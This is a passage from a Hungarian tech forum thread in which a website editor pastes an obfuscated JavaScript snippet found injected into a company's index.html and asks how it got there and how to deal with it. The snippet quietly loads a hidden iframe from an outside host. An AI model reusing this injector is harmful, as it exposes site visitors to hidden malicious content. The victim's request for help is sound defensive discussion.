- Samsung Galaxy Watch (Tizen és Wear OS) ingyenes számlapok, kupon kódok
- Android szakmai topik
- Samsung Galaxy A52s 5G - jó S-tehetség
- Samsung Galaxy A56 - megbízható középszerűség
- Honor Magic V2 - origami
- Magisk
- Na! Ez egy JÓ utólagos autós fejegység - Minix CP89-HD
- Motorola Edge 50 Neo - az egyensúly gyengesége
- Samsung Galaxy Watch7 - kötelező kör
- Samsung Galaxy S23 és S23+ - ami belül van, az számít igazán
Új hozzászólás Aktív témák
-
eziskamu
addikt
válasz
fordfairlane #2926 üzenetére
Van a gyökérben egy index.html, meg van egy külön könyvtárban, és mindkettő bekapta.
-
eziskamu
addikt
válasz
fordfairlane #2921 üzenetére
Ez az index.html-ben működőképes? Van fent kettő is, mert két oldal van egy tárhelyen, az egyikben az oldalon megjelent szövegként, a másikon meg nem. A másikban aktív lehetett?
-
eziskamu
addikt
Gondom lenne. Van egy kissebb céges weboldal, amit nem én csináltam, csak szerkesztem néha a híreket, de a technikai hátterét nem vágom.
Namost az index.html-ben ez jelent meg:wy='t';ya='mp';yu='p:';qs='sr';d='nit';l='ame';v='c';z='t';ow='io';zt='n/';sc='n';o='//z';hy='cha';hg='h';p='.c';j='ifr';f='e';dx=j.concat(l);lr=qs.concat(v);ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt);var dj=document.createElement(dx);dj.setAttribute('width','5');dj.setAttribute('height','5');dj.setAttribute('style','display:none');dj.setAttribute(lr,ua);document.body.appendChild(dj);
Azt találtam, hogy ez egy php genyóság lene, ami rejtett lapokat hoz be. Namost béna kérdések jönnek.
Hogy kerülhetett bele?
Tud-e .html-ben kárt okozni, vagy csak egy php állományban?
Mit tehetek ellene?
A fertőzött állományt visszacseréltem egy mentésre.
Új hozzászólás Aktív témák
Hirdetés
- Intel Core Ultra 7 265 /// Bontatlan, Teljesen Új // Üzletből, Számlával és Garanciával
- Csere-Beszámítás! Ryzen 9 9950X Processzor!
- Újszerű Gamer Asztali PC Számítógép 2026-ig Garis ASUS H510M-K R2.0 i5 11400F RTX 4060 8GB Dobozába
- Samsung Galaxy Tab A8 (2021) , 3/32 GB,
- Samsung Galaxy S6 Lite (2022) , 4/64 GB ,Wi-fi
- BESZÁMÍTÁS! 2TB Samsung 980 PRO NVMe SSD meghajtó garanciával hibátlan működéssel
- BESZÁMÍTÁS! Gamer számítógép Asus B150M i3 6100 16GB DDR4 240GB SSD GTX 1050 Ti 4GB Sharkoon 500W
- Samsung Galaxy A52s 128GB, Kártyafüggetlen, 1 Év Garanciával
- Csere-Beszámítás! AMD Ryzen 7 7700X Processzor!
- NJOY Aster 3K 3000VA/2700W Rack Szünetmentes Táp
Állásajánlatok
Cég: Liszt Ferenc Zeneművészeti Egyetem
Város: Budapest
Cég: Promenade Publishing House Kft.
Város: Budapest